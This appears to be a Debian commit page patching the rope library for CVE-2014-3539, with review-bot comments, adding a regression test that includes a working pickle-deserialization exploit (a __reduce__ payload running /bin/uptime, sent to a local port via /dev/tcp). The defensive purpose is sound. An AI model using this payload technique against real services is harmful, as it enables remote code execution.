Commit 6c740f03 authored by Arnaud Fontaine's avatar Arnaud Fontaine

merge patched into master

parents 8b73febe 8b29730f
# see git-dpm(1) from git-dpm package
835afd55ba93a1632462d454b5be0985b6ca9794
835afd55ba93a1632462d454b5be0985b6ca9794
8b29730f46571086b880fee6be33f56623c613bc
8b29730f46571086b880fee6be33f56623c613bc
835afd55ba93a1632462d454b5be0985b6ca9794
835afd55ba93a1632462d454b5be0985b6ca9794
rope_0.10.3.orig.tar.gz
......
From 8b29730f46571086b880fee6be33f56623c613bc Mon Sep 17 00:00:00 2001
From: Arnaud Fontaine <arnau@debian.org>
Date: Thu, 26 Jan 2017 13:38:11 +0900
Subject: =?UTF-8?q?Mitigations=20for=20CVE-2014-3539=20from=20the=20upstre?=
=?UTF-8?q?am=20author=20personal=20repository=0A(https://github.com/mcepl?=
=?UTF-8?q?/rope):?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
commit a2ea5f98d18ed037090afb048a48f87b515ff8dc
Author: Matěj Cepl <mcepl@cepl.eu>
Date: Tue Feb 10 12:34:20 2015 +0100
Just add reporter’s suggested reproducer
commit a6cb534debe9aff623b6b19ae2dedbf872069a50
Author: Matej Cepl <mcepl@cepl.eu>
Date: Thu Feb 12 01:12:15 2015 +0100
limit socket connections to localhost
Patch-Name: CVE-2014-3539
---
rope/base/oi/doa.py | 2 +-
ropetest/CVE20143539/CVE-2014-3539.py | 18 ++++++++++++++++++
ropetest/CVE20143539/README.md | 17 +++++++++++++++++
ropetest/CVE20143539/__init__.py | 32 ++++++++++++++++++++++++++++++++
ropetest/CVE20143539/generate_payload.py | 8 ++++++++
ropetest/CVE20143539/payload.txt | 9 +++++++++
ropetest/CVE20143539/project/hello.py | 1 +
ropetest/CVE20143539/run_reproducer.sh | 11 +++++++++++
ropetest/__init__.py | 3 +++
9 files changed, 100 insertions(+), 1 deletion(-)
create mode 100644 ropetest/CVE20143539/CVE-2014-3539.py
create mode 100644 ropetest/CVE20143539/README.md
create mode 100644 ropetest/CVE20143539/__init__.py
create mode 100644 ropetest/CVE20143539/generate_payload.py
create mode 100644 ropetest/CVE20143539/payload.txt
create mode 100644 ropetest/CVE20143539/project/hello.py
create mode 100644 ropetest/CVE20143539/run_reproducer.sh
diff --git a/rope/base/oi/doa.py b/rope/base/oi/doa.py
index de45902..ed44d25 100644
--- a/rope/base/oi/doa.py
+++ b/rope/base/oi/doa.py
@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
self.data_port = 3037
while self.data_port < 4000:
try:
- self.server_socket.bind(('', self.data_port))
+ self.server_socket.bind(('127.0.0.1', self.data_port))
break
except socket.error:
self.data_port += 1
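Review bot: Binding to `('127.0.0.1', self.data_port)` keeps remote hosts off the listener, but any local user or process on the same machine can still connect to it, and the port still comes from the predictable 3037–3999 range. The reproducer added in this same patch sends a pickle stream to that port, so the receiving side (outside this hunk) presumably still deserializes whatever a local peer sends; the change narrows exposure rather than removing the unsafe deserialization. A follow-up should authenticate the peer or use a channel only the child process can reach, for example a Unix-domain socket in a private directory or a per-run secret checked before anything is unpickled. At minimum the line deserves a comment such as `# loopback only: CVE-2014-3539 mitigation; local peers are still unauthenticated`. The enclosing method starts and ends outside the hunk.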
diff --git a/ropetest/CVE20143539/CVE-2014-3539.py b/ropetest/CVE20143539/CVE-2014-3539.py
new file mode 100644
index 0000000..5dd37e1
--- /dev/null
+++ b/ropetest/CVE20143539/CVE-2014-3539.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python
+# CVE-2014-3539 reproducer/exploit
+# Vasyl Kaigorodov <vkaigoro@redhat.com>
+# Tested on Python 2.7.x
+
+import sys
+from rope.base import project
+
+try:
+ open('payload.txt', 'r')
+except IOError:
+ print("payload.txt not found, run:")
+ print("\tpython generate_payload.py")
+ sys.exit(1)
+
+myproject = project.Project('project/')
+res = myproject.get_resource("hello.py")
+myproject.pycore.run_module(res)
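Review bot: The existence check `open('payload.txt', 'r')` opens the file and never closes it, and every path in the script (`payload.txt`, `project/`) is relative to the current directory, so it only works when started from `ropetest/CVE20143539`. `if not os.path.isfile('payload.txt'):` (with `import os`) expresses the check without leaking a handle. A one-line module comment saying the script must be run from its own directory, as `run_reproducer.sh` and the unittest's `cwd=cur_dir` do, would document that assumption.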
diff --git a/ropetest/CVE20143539/README.md b/ropetest/CVE20143539/README.md
new file mode 100644
index 0000000..5c620ef
--- /dev/null
+++ b/ropetest/CVE20143539/README.md
@@ -0,0 +1,17 @@
+== List of files ==
+
+project/ - directory containing an example python module
+CVE-2014-3539.py - python script which tries to load an example python module
+ for re-factoring (normal workflow simulation)
+generate_payload.py - generates payload.txt (evil code to run)
+payload.txt - example payload (running /bin/uptime)
+run_reproducer.sh - main file that sticks above together
+
+== Usage ==
+
+Run ./run_reproducer.sh.
+If the system is vulnerable, you'll see the output similar to below:
+
+ $ ./run_reproducer.sh
+ SUCCESS: 15:13:46 up 21:26, 2 users, load average: 0.02, 0.63, 1.01
+
diff --git a/ropetest/CVE20143539/__init__.py b/ropetest/CVE20143539/__init__.py
new file mode 100644
index 0000000..3ab3be6
--- /dev/null
+++ b/ropetest/CVE20143539/__init__.py
@@ -0,0 +1,32 @@
+import os.path
+import subprocess
+try:
+ import unittest2 as unittest
+except ImportError:
+ import unittest
+
+
+class TestCVE20143539(unittest.TestCase):
+ def test_case(self):
+ cur_dir = os.path.dirname(__file__)
+ script_name = os.path.join(cur_dir, 'run_reproducer.sh')
+ pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
+ stderr=subprocess.PIPE, cwd=cur_dir)
+ pid.communicate()
+ self.assertEquals(pid.returncode, 0)
+
+
+def suite():
+ result = unittest.TestSuite()
+ result.addTests(unittest.makeSuite(TestCVE20143539))
+ return result
+
+
+if __name__ == '__main__':
+ import sys
+ if len(sys.argv) > 1:
+ unittest.main()
+ else:
+ runner = unittest.TextTestRunner()
+ res = runner.run(suite())
+ sys.exit(not res.wasSuccessful())
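Review bot: `test_case` asserts only `pid.returncode == 0` and discards the stdout it captured, yet `run_reproducer.sh` exits with the status of the plain `python CVE-2014-3539.py` run and reports an accepted payload only by printing `SUCCESS:`. As written, the test looks like it passes whether or not the listener accepted the payload, so it would not catch a regression of the fix. Keep the output and assert on it, e.g. `out, _ = pid.communicate()` followed by `self.assertNotIn(b'SUCCESS', out)`. If that assertion fails on the patched code, it shows the listener still accepts local peers. Also use `assertEqual`, since `assertEquals` is a deprecated alias.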
diff --git a/ropetest/CVE20143539/generate_payload.py b/ropetest/CVE20143539/generate_payload.py
new file mode 100644
index 0000000..c8d3e01
--- /dev/null
+++ b/ropetest/CVE20143539/generate_payload.py
@@ -0,0 +1,8 @@
+import cPickle
+import subprocess
+
+class RunBinSh(object):
+ def __reduce__(self):
+ return (subprocess.Popen, (('/bin/uptime',),))
+
+open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
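Review bot: The generator writes through `open('payload.txt', 'w').write(...)` without closing the file, and it imports `cPickle`, so it runs only on Python 2 even though `payload.txt` is also committed next to it. Use `with open('payload.txt', 'w') as fh: fh.write(cPickle.dumps(RunBinSh()))`. Add a module comment saying that this is a fixture generator for the CVE-2014-3539 regression test, that it can only be regenerated on Python 2, and that the checked-in `payload.txt` is the file `run_reproducer.sh` reads.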
diff --git a/ropetest/CVE20143539/payload.txt b/ropetest/CVE20143539/payload.txt
new file mode 100644
index 0000000..434dd0f
--- /dev/null
+++ b/ropetest/CVE20143539/payload.txt
@@ -0,0 +1,9 @@
+csubprocess
+Popen
+p1
+((S'/bin/uptime'
+p2
+tp3
+tp4
+Rp5
+.
\ No newline at end of file
diff --git a/ropetest/CVE20143539/project/hello.py b/ropetest/CVE20143539/project/hello.py
new file mode 100644
index 0000000..7df869a
--- /dev/null
+++ b/ropetest/CVE20143539/project/hello.py
@@ -0,0 +1 @@
+print("Hello, World!")
diff --git a/ropetest/CVE20143539/run_reproducer.sh b/ropetest/CVE20143539/run_reproducer.sh
new file mode 100644
index 0000000..b1f7fac
--- /dev/null
+++ b/ropetest/CVE20143539/run_reproducer.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
+trap "killall -- $(basename $0)" EXIT
+
+(while : ; do
+ ( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
+ && echo -n "SUCCESS: "
+done)&
+
+python CVE-2014-3539.py 2>/dev/null
+exit $?
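Review bot: `trap "killall -- $(basename $0)" EXIT` signals every process named `run_reproducer.sh` that the caller is allowed to signal, not just the background loop started here, so two test runs on one machine (or parallel CI jobs) would kill each other. Record the loop's PID instead: add `loop_pid=$!` right after `done)&` and set the trap to `trap 'kill "$loop_pid" 2>/dev/null' EXIT`. The loop also retries with no delay and targets the fixed port 3037, while `doa.py` moves to the next port when 3037 is busy. A short `sleep` and a comment stating the port assumption would make the script more predictable.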
diff --git a/ropetest/__init__.py b/ropetest/__init__.py
index f1cb459..744beee 100644
--- a/ropetest/__init__.py
+++ b/ropetest/__init__.py
@@ -16,6 +16,8 @@ import ropetest.simplifytest
import ropetest.contrib
import ropetest.refactor
+import ropetest.CVE20143539
+
def suite():
result = unittest.TestSuite()
@@ -33,6 +35,7 @@ def suite():
result.addTests(ropetest.refactor.suite())
result.addTests(ropetest.contrib.suite())
+ result.addTests(ropetest.CVE20143539.suite())
return result
......@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
self.data_port = 3037
while self.data_port < 4000:
try:
self.server_socket.bind(('', self.data_port))
self.server_socket.bind(('127.0.0.1', self.data_port))
break
except socket.error:
self.data_port += 1
......
#!/usr/bin/env python
# CVE-2014-3539 reproducer/exploit
# Vasyl Kaigorodov <vkaigoro@redhat.com>
# Tested on Python 2.7.x
import sys
from rope.base import project
try:
open('payload.txt', 'r')
except IOError:
print("payload.txt not found, run:")
print("\tpython generate_payload.py")
sys.exit(1)
myproject = project.Project('project/')
res = myproject.get_resource("hello.py")
myproject.pycore.run_module(res)
== List of files ==
project/ - directory containing an example python module
CVE-2014-3539.py - python script which tries to load an example python module
for re-factoring (normal workflow simulation)
generate_payload.py - generates payload.txt (evil code to run)
payload.txt - example payload (running /bin/uptime)
run_reproducer.sh - main file that sticks above together
== Usage ==
Run ./run_reproducer.sh.
If the system is vulnerable, you'll see the output similar to below:
$ ./run_reproducer.sh
SUCCESS: 15:13:46 up 21:26, 2 users, load average: 0.02, 0.63, 1.01
import os.path
import subprocess
try:
import unittest2 as unittest
except ImportError:
import unittest
class TestCVE20143539(unittest.TestCase):
def test_case(self):
cur_dir = os.path.dirname(__file__)
script_name = os.path.join(cur_dir, 'run_reproducer.sh')
pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=cur_dir)
pid.communicate()
self.assertEquals(pid.returncode, 0)
def suite():
result = unittest.TestSuite()
result.addTests(unittest.makeSuite(TestCVE20143539))
return result
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
unittest.main()
else:
runner = unittest.TextTestRunner()
res = runner.run(suite())
sys.exit(not res.wasSuccessful())
import cPickle
import subprocess
class RunBinSh(object):
def __reduce__(self):
return (subprocess.Popen, (('/bin/uptime',),))
open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
csubprocess
Popen
p1
((S'/bin/uptime'
p2
tp3
tp4
Rp5
.
\ No newline at end of file
#!/bin/bash
export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
trap "killall -- $(basename $0)" EXIT
(while : ; do
( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
&& echo -n "SUCCESS: "
done)&
python CVE-2014-3539.py 2>/dev/null
exit $?
......@@ -16,6 +16,8 @@ import ropetest.simplifytest
import ropetest.contrib
import ropetest.refactor
import ropetest.CVE20143539
def suite():
result = unittest.TestSuite()
......@@ -33,6 +35,7 @@ def suite():
result.addTests(ropetest.refactor.suite())
result.addTests(ropetest.contrib.suite())
result.addTests(ropetest.CVE20143539.suite())
return result
......